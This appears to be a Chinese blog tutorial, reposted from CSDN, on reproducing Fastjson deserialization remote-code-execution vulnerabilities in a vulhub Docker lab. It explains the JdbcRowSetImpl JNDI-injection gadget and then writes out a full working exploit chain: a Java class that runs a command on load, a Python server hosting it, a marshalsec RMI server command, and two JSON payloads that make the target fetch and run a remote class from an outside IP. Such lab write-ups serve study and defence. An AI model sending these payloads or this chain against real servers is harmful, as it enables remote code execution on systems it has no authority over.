Fastjson 反序列化漏洞利用总结

本篇文章对Fastjson漏洞利用的过程做个简单的记录。

背景：

Fastjson是Alibaba开发的，java语言编写的高性能JSON库，采用“假定有序快速匹配”的算法，号称Java语言中最快的JSON库。

其项目地址为https://github.com/alibaba/fastjson，其提供两个主要接口toJsonString和parseObject来分别实现序列化和反序列化。示例代码：

//序列化
User user = new User("guest",2);
String jsonString = JSON.toJSONString(user)

//反序列化
String jsonString = "{\\"name\\":\\"guest\\",\\"age\\":12}"
User user = (User)JSON.parse(jsonString)

其最近几年爆出的漏洞影响都比较大，下面会进行简单的说明。

20170315第一次爆出的漏洞

2017年3月15日，Alibaba官方发布了一条安全更新:https://github.com/alibaba/fastjson/wiki/security_update_20170315。宣布fastjson<=1.2.24存在远程代码执行高危安全漏洞。

利用原理：

因为fastjson在处理以@type形式传入的类的时候，会默认调用该类的共有setgetis函数，因此我们在寻找利用类的时候思路如下：
1、类的成员变量我们可以控制；
2、想办法在调用类的某个setgetis函数的时候造成命令执行。

于是便找到了JdbcRowSetImpl类，该类在setAutoCommit函数中会对成员变量dataSourceName进行lookup，标准的jndi注入利用。(jndi注入是什么可以看下https://paper.seebug.org/417/)

其利用栈：

Exec:620,Runtime //命令执行
Lookup:417,InitalContext /jndi lookup函数通过rmi或者ldap获取恶意类
setAutoCommit:4067,JdbcRowSetImpl 通过setAutoCommit从而在后面触发了lookup函数
setValue:96,FieldDeserializer //反射调用传入类的set函数
deserialze:600, JavaBeanDeserializer 通过循环调用传入类的共有set,get,is函数
parseObject:368,DefaultJSONParser 解析传入的json字符串

原理大概就那么多，接下来搭建环境复现一下，采用docker(https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce)搭建即可。

测试环境：

Kali 系统： 172.21.137.36
Win10 系统：172.21.137.5
外网系统：173.82.232.183

环境搭建：

搭建前提：

Kali系统需要安装docker（自行查询，这个不难）
Kali系统需要克隆vulhub,地址：https://github.com/vulhub/vulhub
Win10系统需要安装 jdk1.6（由于多个jdk可以同时存在，所以可以安装到某个指定目录，到时候在bin目录下执行脚本即可）

搭建过程

cd到1.2.47-rce目录下，使用Docker命令：docker-compose up -d 来启动容器：
环境运行后，访问 http://172.21.137.36:8090，即可看到JSON格式的输出
再次请求，使用BurpSuite抓包，POST一个JSON对象，看是否正常：
环境启动以及更新服务端信息正常，开始构造POC。
首先在Windows 的 jdk1.6安装目录中的 bin 目录下创建一个TouchFile.java文件，内容如下：

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

在 bin 目录下，打开PowerShell，编译该文件，命令: javac TouchFile.java。
编译好后，在当前目录下会有一个TouchFile.class的文件。
把编译好的class文件传到外网系统中。
并在class文件所在的目录，使用python3开启监听，命令:python3 -m http.server 5555

这样访问http://173.82.232.183:5555/TouchFile.class，就可以访问到该文件了。
之后需要借助marshalsec项目，启动一个RMI服务器，监听9999端口，并制定加载远程类TouchFile.class（这个操作复杂，一步步来讲，我自己也是搞了好久，如果要使用LDAP服务，可以参考这篇文章，地址）
首先在外网服务器安装 maven,命令:apt install maven
再 git clone https://github.com/mbechler/marshalsec.git
接着 cd 到 marshalsec目录下，输入命令: mvn clean package -DskipTests
git clone https://github.com/CaijiOrz/fastjson-1.2.47-RCE.git，克隆好后，把里面的marshalsec-0.0.3-SNAPSHOT-all.jar 文件复制到/root/目录下
输入命令：java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://173.82.232.183:5555/#TouchFile" 9999（这里要注意，前面开启的5555端口和这个9999端口都要同时监听着，开两个终端窗口都连上外网系统就好解决了）
在Windows中的BurpSuite中更改POST包，内容如下：

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://173.82.232.183:9999/TouchFile",
        "autoCommit":true
    }
}

重放该请求包，查看到有响应了：
最后在使用docker，就能看到成功的在tmp/目录下创建了success的文件了：

以上就成功了！：）

另一个版本的利用：

2019年七月份，官方公布了fastjson< 1.2.48 版本存在的rce安全问题，其靶机环境也可以用docker来搭建，都在vulhub的项目中，感兴趣的可以自己搭建试试，两个版本的利用过程仅仅是POST请求包内容不一样而已，这里再附上POST包：

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://173.82.232.183:9999/TouchFile",
        "autoCommit":true
    }
}

最后，关于fastjson漏洞探测和一些版本绕过的POC,可以参考这篇文章底部的第4点：fastjson漏洞复现

PS：这个漏洞探测有个坑，你无法知道对方服务器使用的jdk是什么版本的，所以需要自己从jdk 1.6(Java SE6)、jdk1.7(Java SE7)、jdk1.8(Java SE8)一个个试过来，这目前没什么好办法来判断。(附上JDK下载地址，对应着下载)

参考链接：

来源：CSDN

作者：初心者|

链接：https://blog.csdn.net/roukmanx/article/details/103585889

标签

fastjson

序列化

fastjson使用